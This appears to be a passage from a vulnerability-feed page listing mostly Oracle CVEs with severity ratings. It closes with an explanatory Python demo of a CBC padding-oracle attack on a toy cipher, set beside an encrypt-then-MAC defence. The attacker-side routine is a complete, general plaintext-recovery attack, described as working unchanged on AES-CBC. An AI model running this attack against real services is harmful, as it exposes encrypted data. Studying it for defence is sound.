Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. [CVSS 4.6 MEDIUM]

Oracle Virtualbox Denial Of Service +1
NVD
CVE-2026-21980
EPSS 0% CVSS 6.5
MEDIUM This Month

Life Sciences Central Coding versions up to 7.0.1.0 contain a vulnerability that allows attackers unauthorized update, insert or delete access to some of Oracle Life Sciences Cen (CVSS 6.5).

Oracle Life Sciences Central Coding
NVD
CVE-2026-21979
EPSS 0% CVSS 4.2
MEDIUM This Month

Unauthorized data access in Oracle Planning and Budgeting Cloud Service (version 25.04.07) can be achieved by high-privileged attackers with local infrastructure access through the EPM Agent component. The vulnerability requires user interaction from a non-attacker and allows complete compromise of accessible Planning and Budgeting data. No patch is currently available.

Oracle
NVD
CVE-2026-21978
EPSS 0% CVSS 6.5
MEDIUM This Month

Flexcube Universal Banking contains a vulnerability that allows attackers unauthorized access to critical data or complete access to all Oracle FLEXCUBE U (CVSS 6.5).

Oracle Flexcube Universal Banking
NVD
CVE-2026-21977
EPSS 0% CVSS 3.1
LOW Monitor

Vulnerability in the Oracle Zero Data Loss Recovery Appliance Software product of Oracle Zero Data Loss Recovery Appliance (component: Security). Supported versions that are affected are 23.1.0-23.1.202509. [CVSS 3.1 LOW]

Oracle
NVD
CVE-2026-21976
EPSS 0% CVSS 7.1
HIGH This Week

Business Intelligence versions up to 7.6.0.0.0 contain a vulnerability that allows attackers unauthorized creation, deletion or modification access to critical data or all O (CVSS 7.1).

Oracle Industrial Business Intelligence
NVD
CVE-2026-21975
EPSS 0% CVSS 4.5
MEDIUM This Month

Vulnerability in the Java VM component of Oracle Database Server. Supported versions that are affected are 19.3-19.29 and 21.3-21.20. [CVSS 4.5 MEDIUM]

Oracle Java Denial Of Service +2
NVD
CVE-2026-21974
EPSS 0% CVSS 5.3
MEDIUM This Month

Unauthenticated attackers can read sensitive data from Oracle Life Sciences Central Designer 7.0.1.0 through an easily exploitable information disclosure vulnerability accessible via HTTP. The flaw requires no user interaction or privileges, allowing remote attackers with network access to gain unauthorized access to a subset of application data. No patch is currently available for this vulnerability.

Oracle Life Sciences Central Designer
NVD
CVE-2026-21973
EPSS 0% CVSS 8.1
HIGH This Week

Flexcube Investor Servicing versions up to 14.5.0.15.0 contain a vulnerability that allows attackers unauthorized creation, deletion or modification access to critical data or all O (CVSS 8.1).

Oracle Flexcube Investor Servicing
NVD
CVE-2026-21972
EPSS 0% CVSS 5.3
MEDIUM This Month

Configurator contains a vulnerability that allows attackers unauthorized read access to a subset of Oracle Configurator accessible data (CVSS 5.3).

Oracle Configurator
NVD
CVE-2026-21971
EPSS 0% CVSS 5.4
MEDIUM This Month

Peoplesoft Supply Chain Management Purchasing versions up to 9.2 contain a vulnerability that allows attackers unauthorized update, insert or delete access to some of PeopleSoft Enterprise SC (CVSS 5.4).

Oracle Peoplesoft Supply Chain Management Purchasing
NVD
CVE-2026-21970
EPSS 0% CVSS 6.5
MEDIUM This Month

Life Sciences Central Designer versions up to 7.0.1.0 contain a vulnerability that allows attackers unauthorized access to critical data or complete access to all Oracle Life Scien (CVSS 6.5).

Oracle Life Sciences Central Designer
NVD
CVE-2026-21969
EPSS 0% CVSS 9.8
CRITICAL Act Now

Oracle Agile PLM for Process has a CVSS 9.8 vulnerability in the Supply Chain Sourcing component that allows unauthenticated remote attackers to fully compromise the system.

Oracle Agile Product Lifecycle Management For Process
NVD
CVE-2026-21968
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Mysql Server contains a vulnerability that allows attackers the unauthorized ability to cause a hang or frequently repeatable crash (complete DO (CVSS 6.5).

Oracle MySQL Mssql +4
NVD VulDB
CVE-2026-21967
EPSS 0% CVSS 8.6
HIGH This Week

Hospitality Opera 5 versions up to 5.6.19.23 contain a vulnerability that allows attackers unauthorized access to critical data or complete access to all Oracle Hospitalit (CVSS 8.6).

Oracle Denial Of Service Hospitality Opera 5
NVD
CVE-2026-21966
EPSS 0% CVSS 6.1
MEDIUM This Month

Hospitality Opera 5 versions up to 5.6.19.23 contain a vulnerability that allows attackers unauthorized update, insert or delete access to some of Oracle Hospitality OPERA (CVSS 6.1).

Oracle Hospitality Opera 5
NVD
CVE-2026-21965
EPSS 0% CVSS 2.7
LOW Monitor

Mysql Server contains a vulnerability that allows attackers the unauthorized ability to cause a partial denial of service (partial DOS) of MySQL (CVSS 2.7).

Oracle MySQL Mssql +1
NVD VulDB
CVE-2026-21964
EPSS 0% CVSS 4.9
MEDIUM PATCH This Month

Mysql contains a vulnerability that allows attackers the unauthorized ability to cause a hang or frequently repeatable crash (complete DO (CVSS 4.9).

Oracle MySQL Mssql +3
NVD VulDB
CVE-2026-21963
EPSS 0% CVSS 6.0
MEDIUM This Month

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. [CVSS 6.0 MEDIUM]

Oracle Virtualbox Vm Virtualbox +1
NVD
CVE-2026-21962
EPSS 0% CVSS 10.0
CRITICAL PATCH Act Now

Oracle HTTP Server and WebLogic Server Proxy Plug-in have a CVSS 10.0 access control vulnerability allowing unauthenticated network attackers to fully compromise the middleware layer.

Oracle Apache Iis +2
NVD GitHub
CVE-2026-21961
EPSS 0% CVSS 6.1
MEDIUM This Month

Unauthenticated attackers can exploit a cross-site request forgery vulnerability in Oracle PeopleSoft Enterprise HCM Human Resources 9.2 through the Company Directory/Org Chart Viewer component to read, modify, or delete sensitive employee data via HTTP with user interaction. The vulnerability requires a victim to click a malicious link but impacts multiple PeopleSoft products and modules beyond the initial target. No patch is currently available for this medium-severity issue (CVSS 6.1).

Oracle Peoplesoft Enterprise Hcm Human Resources
NVD
CVE-2026-21960
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Oracle Applications DBA versions 12.2.3-12.2.15 contain an authorization flaw in the Java utilities component that allows high-privileged attackers to gain unauthorized read and write access to sensitive data via HTTP. An authenticated attacker with administrative credentials can exploit this vulnerability to create, modify, or delete critical application data without restriction. A patch is available and should be prioritized for deployment in affected Oracle E-Business Suite environments.

Oracle Java Applications Dba
NVD
CVE-2026-21959
EPSS 0% CVSS 4.9
MEDIUM PATCH This Month

Unauthorized data disclosure in Oracle Workflow Loader (versions 12.2.3-12.2.15) allows high-privileged attackers with network access to extract sensitive information from the Oracle E-Business Suite environment. The vulnerability requires administrator-level credentials and HTTP connectivity but can result in complete exposure of workflow-accessible data. A patch is available to remediate this confidentiality issue.

Oracle Workflow
NVD
CVE-2026-21957
EPSS 0% CVSS 7.5
HIGH This Week

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. [CVSS 7.5 HIGH]

Oracle Virtualbox Vm Virtualbox +1
NVD
CVE-2026-21956
EPSS 0% CVSS 8.2
HIGH This Week

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. [CVSS 8.2 HIGH]

Oracle Virtualbox Vm Virtualbox +1
NVD
CVE-2026-21955
EPSS 0% CVSS 8.2
HIGH This Week

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. [CVSS 8.2 HIGH]

Oracle Virtualbox Vm Virtualbox +1
NVD
CVE-2026-21952
EPSS 0% CVSS 4.9
MEDIUM PATCH This Month

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Parser). Supported versions that are affected are 9.0.0-9.5.0. [CVSS 4.9 MEDIUM]

Oracle MySQL Mssql +4
NVD VulDB
CVE-2026-21951
EPSS 0% CVSS 6.1
MEDIUM This Month

Peoplesoft Enterprise Peopletools versions up to 8.60 are affected by cross-site scripting (XSS) (CVSS 6.1).

Oracle Peoplesoft Enterprise Peopletools
NVD
CVE-2026-21950
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 9.0.0-9.5.0. [CVSS 6.5 MEDIUM]

Oracle MySQL Mssql +4
NVD VulDB
CVE-2026-21949
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 9.0.0-9.5.0. [CVSS 6.5 MEDIUM]

Oracle MySQL Mssql +4
NVD VulDB
CVE-2026-21948
EPSS 0% CVSS 4.9
MEDIUM PATCH This Month

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.0-8.0.44, 8.4.0-8.4.7 and 9.0.0-9.5.0. [CVSS 4.9 MEDIUM]

Oracle MySQL Mssql +4
NVD VulDB
CVE-2026-21947
EPSS 0% CVSS 3.1
LOW Monitor

Vulnerability in Oracle Java SE (component: JavaFX). Supported versions that are affected are Oracle Java SE: 8u471-b50. [CVSS 3.1 LOW]

Oracle Java
NVD
CVE-2026-21946
EPSS 0% CVSS 6.1
MEDIUM This Month

JD Edwards EnterpriseOne Tools versions 9.2.0.0 through 9.2.26.0 are vulnerable to cross-site scripting (XSS) in the Web Runtime SEC component, allowing unauthenticated attackers to manipulate data and read sensitive information through HTTP with user interaction. The vulnerability has network-wide scope, potentially compromising connected systems beyond the primary application. No patch is currently available.

Oracle Jd Edwards Enterpriseone Tools
NVD
CVE-2026-21945
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Remote denial of service in Oracle Java SE, GraalVM for JDK, and GraalVM Enterprise Edition allows unauthenticated attackers to trigger application hangs or crashes via network-accessible protocols. Multiple Java versions including JDK 8u471, 11.0.29, 17.0.17, 21.0.9, and 25.0.1 are affected through a flaw in the Security component. No patch is currently available for this high-severity vulnerability.

Oracle Java Denial Of Service +6
NVD
CVE-2026-21944
EPSS 0% CVSS 6.5
MEDIUM This Month

Agile Product Lifecycle Management for Process versions up to 6.2.4 are affected by cross-site scripting (XSS) (CVSS 6.5).

Oracle Agile Product Lifecycle Management For Process
NVD
CVE-2026-21943
EPSS 0% CVSS 6.1
MEDIUM This Month

Reflected cross-site scripting in the Scripting Admin component of Oracle Scripting, part of Oracle E-Business Suite (versions 12.2.3 through 12.2.15), allows an unauthenticated attacker with network access via HTTP to read or modify some of the data accessible to the application, provided a victim interacts with attacker-supplied content such as a crafted link. The CVSS Scope metric is Changed because the payload executes in the victim's browser rather than in the vulnerable server component, which is what lifts an otherwise low-impact finding to 6.1 (Medium): network vector, low attack complexity, no privileges required, user interaction required, low confidentiality and integrity impact. No patch is currently available.

Oracle Scripting
NVD
CVE-2026-21942
EPSS 0% CVSS 5.0
MEDIUM This Month

Vulnerability in the Oracle Solaris product of Oracle Systems (component: Filesystems). Supported versions that are affected are 10 and 11. [CVSS 5.0 MEDIUM]

Oracle Denial Of Service Solaris
NVD
CVE-2026-21941
EPSS 0% CVSS 4.9
MEDIUM PATCH This Month

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.0-8.0.44, 8.4.0-8.4.7 and 9.0.0-9.5.0. [CVSS 4.9 MEDIUM]

Oracle MySQL Mssql +4
NVD VulDB
CVE-2026-21940
EPSS 0% CVSS 7.5
HIGH This Week

An unauthenticated attacker with network access via HTTP can compromise the User and User Group component of Oracle Agile PLM 9.3.6 (part of Oracle Supply Chain Products Suite) and read sensitive data, up to all data accessible to the application. The attack is easy to mount and needs no user interaction; the CVSS 7.5 (High) reflects network vector, low complexity, no privileges, and a confidentiality impact only. No patch is currently available.

Oracle Supply Chain Products Suite
NVD
CVE-2026-21939
EPSS 0% CVSS 7.0
HIGH This Week

Vulnerability in the SQLcl component of Oracle Database Server. Supported versions that are affected are 23.4.0-23.26.0. [CVSS 7.0 HIGH]

Oracle Database Server
NVD
CVE-2026-21938
EPSS 0% CVSS 6.1
MEDIUM This Month

PeopleSoft Enterprise PeopleTools versions up to 8.60 contain a vulnerability that gives attackers unauthorized update, insert or delete access to some of PeopleSoft Enterprise Pe (CVSS 6.1).

Oracle Peoplesoft Enterprise Peopletools
NVD
CVE-2026-21937
EPSS 0% CVSS 4.9
MEDIUM PATCH This Month

MySQL Server contains a vulnerability that gives attackers the unauthorized ability to cause a hang or frequently repeatable crash (complete DO (CVSS 4.9).

Oracle MySQL Mssql +4
NVD VulDB
CVE-2026-21936
EPSS 0% CVSS 4.9
MEDIUM PATCH This Month

MySQL Cluster contains a vulnerability that gives attackers the unauthorized ability to cause a hang or frequently repeatable crash (complete DO (CVSS 4.9).

Oracle MySQL Mssql +5
NVD VulDB
CVE-2026-21935
EPSS 0% CVSS 5.8
MEDIUM This Month

Oracle Solaris versions up to 11 contain a vulnerability that gives attackers unauthorized creation, deletion or modification access to critical data or all O (CVSS 5.8).

Oracle Solaris
NVD
CVE-2026-21934
EPSS 0% CVSS 5.4
MEDIUM This Month

PeopleSoft Enterprise PeopleTools versions up to 8.60 contain a vulnerability that gives attackers unauthorized update, insert or delete access to some of PeopleSoft Enterprise Pe (CVSS 5.4).

Oracle Peoplesoft Enterprise Peopletools
NVD
CVE-2026-21933
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

Oracle GraalVM versions up to 21.3.16 contain a vulnerability that gives attackers unauthorized update, insert or delete access to some of Oracle Java SE, Oracle G (CVSS 6.1).

Oracle Java Graalvm +5
NVD
CVE-2026-21932
EPSS 0% CVSS 7.4
HIGH PATCH This Week

Oracle GraalVM versions up to 21.3.16 contain a vulnerability that gives attackers unauthorized creation, deletion or modification access to critical data or all O (CVSS 7.4).

Oracle Java Jre +5
NVD
CVE-2026-21931
EPSS 0% CVSS 5.4
MEDIUM This Month

Oracle APEX versions up to 23.2.0 contain a vulnerability that gives attackers unauthorized update, insert or delete access to some of Oracle APEX Sample Appli (CVSS 5.4).

Oracle Apex
NVD
CVE-2026-21930
EPSS 0% CVSS 2.3
LOW Monitor

Sun ZFS Storage Appliance Kit versions up to 8.8.0 contain a vulnerability that gives attackers unauthorized update, insert or delete access to some of Oracle ZFS Storage Appli (CVSS 2.3).

Oracle
NVD
CVE-2026-21929
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

MySQL Server contains a vulnerability that gives attackers the unauthorized ability to cause a hang or frequently repeatable crash (complete DO (CVSS 5.3).

Oracle MySQL Mssql +4
NVD VulDB
CVE-2026-21928
EPSS 0% CVSS 5.3
MEDIUM This Month

Vulnerability in the Oracle Solaris product of Oracle Systems (component: Kernel). The supported version that is affected is 11. [CVSS 5.3 MEDIUM]

Oracle Linux Solaris
NVD
CVE-2026-21927
EPSS 0% CVSS 5.8
MEDIUM This Month

Oracle Solaris versions up to 10 contain a vulnerability that gives attackers unauthorized creation, deletion or modification access to critical data or all O (CVSS 5.8).

Oracle Solaris
NVD
CVE-2026-21926
EPSS 0% CVSS 7.5
HIGH This Week

Siebel Customer Relationship Management Deployment contains a vulnerability that gives attackers the unauthorized ability to cause a hang or frequently repeatable crash (complete DO (CVSS 7.5).

Oracle Tls Denial Of Service +1
NVD
CVE-2026-21925
EPSS 0% CVSS 4.8
MEDIUM PATCH This Month

Oracle GraalVM versions up to 21.3.16 contain a vulnerability that gives attackers unauthorized update, insert or delete access to some of Oracle Java SE, Oracle G (CVSS 4.8).

Oracle Java Jre +5
NVD
CVE-2026-21924
EPSS 0% CVSS 5.4
MEDIUM This Month

Oracle Utilities Framework versions up to 4.3.0.3.0 contain a vulnerability that gives attackers unauthorized update, insert or delete access to some of Oracle Utilities Applica (CVSS 5.4).

Oracle Utilities Framework
NVD
CVE-2026-21923
EPSS 0% CVSS 6.5
MEDIUM This Month

Oracle Life Sciences Central Designer versions up to 7.0.1.0 contain a vulnerability that gives attackers unauthorized update, insert or delete access to some of Oracle Life Sciences Cen (CVSS 6.5).

Oracle Life Sciences Central Designer
NVD
CVE-2026-21922
EPSS 0% CVSS 4.2
MEDIUM This Month

Oracle Planning and Budgeting Cloud Service contains a vulnerability that gives attackers unauthorized creation, deletion or modification access to critical data or all O (CVSS 4.2).

Oracle Planning And Budgeting Cloud Service
NVD
CVE-2025-34337
EPSS 0% CVSS 8.7
HIGH This Month

eGovFramework/egovframe-common-components versions up to and including 4.3.1 include Web Editor image upload and related file delivery functionality that uses symmetric encryption to protect URL. Rated high severity (CVSS 8.7), the vulnerability is remotely exploitable with low attack complexity and requires no authentication. No vendor patch is available.

Oracle Authentication Bypass
NVD GitHub
CVE-2025-10703
EPSS 0% CVSS 8.6
HIGH This Month

Improper Control of Generation of Code ('Code Injection') vulnerability in Progress DataDirect Connect for JDBC drivers, Progress DataDirect Open Access JDBC driver and Hybrid Data Pipeline allows. Rated high severity (CVSS 8.6), the vulnerability is remotely exploitable with low attack complexity. No vendor patch is available.

Docker Oracle Apache +7
NVD
CVE-2025-10702
EPSS 0% CVSS 8.6
HIGH This Month

Improper Control of Generation of Code ('Code Injection') vulnerability in Progress DataDirect Connect for JDBC drivers, Progress DataDirect Open Access JDBC driver and Hybrid Data Pipeline allows. Rated high severity (CVSS 8.6), the vulnerability is remotely exploitable with low attack complexity. No vendor patch is available.

Docker Oracle Apache +6
NVD
CVE-2025-64164
EPSS 0% CVSS 8.9
HIGH POC PATCH This Week

DataEase is an open source data visualization and analysis tool. Rated high severity (CVSS 8.9), the vulnerability is remotely exploitable with low attack complexity and requires no authentication. Public exploit code is available.

Deserialization Oracle Java +1
NVD GitHub
CVE-2023-53564
EPSS 0% CVSS 5.5
MEDIUM PATCH This Month

In the Linux kernel, the following vulnerability has been resolved: ocfs2: fix defrag path triggering jbd2 ASSERT code path: ocfs2_ioctl_move_extents ocfs2_move_extents ocfs2_defrag_extent __ocfs2_move_extent + ocfs2_journal_access_di ...

Denial Of Service Linux Oracle +3
NVD
CVE-2025-36758
EPSS 0% CVSS 6.3
MEDIUM This Month

It is possible to bypass the clipping level (the lockout threshold) on authentication attempts in SolaX Cloud by using the 'Forgot Password' functionality as an oracle. Rated medium severity (CVSS 6.3), the vulnerability is remotely exploitable with low attack complexity and requires no authentication. No vendor patch is available.

Authentication Bypass Oracle
NVD
CVE-2025-7383
EPSS 0% CVSS 5.9
MEDIUM This Month

Padding oracle attack vulnerability in Oberon microsystem AG's Oberon PSA Crypto library, in all versions from 1.0.0 up to but not including 1.5.1, allows an attacker to recover plaintexts via timing differences in padding handling. Rated medium severity (CVSS 5.9), the vulnerability requires no authentication. The listing carries no PATCH flag; 1.5.1 is the first release outside the affected range.

Oracle Information Disclosure
NVD
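A padding oracle, whether it leaks through a distinguishable error (as in the Tomcat and wolfSSL entries at the top of this page) or through timing (as in the Oberon PSA Crypto entry above), gives the attacker one bit per query: did the chosen ciphertext decrypt to valid PKCS#7 padding? That bit is enough to recover plaintext byte by byte, at most 256 queries per byte, without ever learning the key. The following Python is an added example written for this page; it is not Oberon's code, not an exploit for CVE-2025-7383, and not taken from any vendor. It runs offline on a constructed toy CBC mode (a small Feistel block cipher built on SHA-256 stands in for AES, because the attack never looks inside the cipher), implements the attacker side including the classic last-byte false-positive check, and contrasts a leaky server with an encrypt-then-MAC server that gives the attack no signal. The key, IV and sample plaintext are constructed for the example.

```python
import hashlib
import hmac
import os

BLOCK = 16
SECRET = b"constructed sample plaintext: padding oracles leak"    # constructed sample input

# Toy invertible block cipher: 4-round Feistel with a SHA-256 round function, constructed so the
# example runs with the standard library. The attack never looks inside it; it works unchanged on AES-CBC.
def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key: bytes, rnd: int, half: bytes) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def block_encrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for rnd in range(4):
        l, r = r, _xor(l, _f(key, rnd, r))
    return l + r

def block_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _f(key, rnd, l)), l
    return l + r

def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key: bytes, iv: bytes, padded: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out

# Vulnerable server: its error code (or, in the timing variant, its latency) reveals padding validity.
def leaky_server(key: bytes, iv: bytes, ct: bytes) -> bool:
    try:
        pkcs7_unpad(cbc_decrypt(key, iv, ct))
        return True
    except ValueError:
        return False

# Hardened server: encrypt-then-MAC, constant-time tag check before any decryption, uniform rejection.
def hardened_server(enc_key, mac_key, iv, ct, tag) -> bool:
    if not hmac.compare_digest(hmac.new(mac_key, iv + ct, hashlib.sha256).digest(), tag):
        return False
    pkcs7_unpad(cbc_decrypt(enc_key, iv, ct))
    return True

# Attacker side: recover D_key(block) right to left using only oracle(iv, ciphertext) -> bool.
def attack_block(oracle, prev: bytes, block: bytes) -> bytes:
    inter = bytearray(BLOCK)
    for j in range(BLOCK - 1, -1, -1):
        pad = BLOCK - j
        probe = bytearray(BLOCK)
        for k in range(j + 1, BLOCK):          # bytes already known are forced to decrypt to `pad`
            probe[k] = inter[k] ^ pad
        for guess in range(256):
            probe[j] = guess
            if not oracle(bytes(probe), block):
                continue
            if j == BLOCK - 1:                 # last byte: rule out an accidental 0x02 0x02 acceptance
                probe[j - 1] ^= 0xFF
                still_ok = oracle(bytes(probe), block)
                probe[j - 1] ^= 0xFF
                if not still_ok:
                    continue
            inter[j] = guess ^ pad
            break
        else:
            raise RuntimeError("oracle never accepted a guess")
    return _xor(bytes(inter), prev)            # plaintext block = D_key(block) XOR previous block

def padding_oracle_decrypt(oracle, iv: bytes, ct: bytes) -> bytes:
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return pkcs7_unpad(b"".join(attack_block(oracle, blocks[i - 1], blocks[i]) for i in range(1, len(blocks))))

def demo() -> tuple:
    """Return (plaintext recovered via the leaky server, whether the hardened server stalled the attack)."""
    key, mac_key, iv = os.urandom(16), os.urandom(16), os.urandom(16)
    ct = cbc_encrypt(key, iv, pkcs7_pad(SECRET))
    recovered = padding_oracle_decrypt(lambda p_iv, p_ct: leaky_server(key, p_iv, p_ct), iv, ct)
    tag = hmac.new(mac_key, iv + ct, hashlib.sha256).digest()
    try:
        padding_oracle_decrypt(lambda p_iv, p_ct: hardened_server(key, mac_key, p_iv, p_ct, tag), iv, ct)
        stalled = False
    except RuntimeError:                       # the oracle only ever answers "no": nothing to work with
        stalled = True
    return recovered, stalled
```

demo() recovers SECRET from the leaky server without touching the key, and stalls on the first byte against the hardened one because a tampered IV never passes the tag check. Against a real timing oracle each probe would be sampled repeatedly to separate the two code paths, and the oracle calls would go over the network; the byte-recovery logic is unchanged. The practical fixes are the ones the hardened server shows: authenticate ciphertext before decrypting (or use an AEAD mode), and make the failure path independent of which check failed.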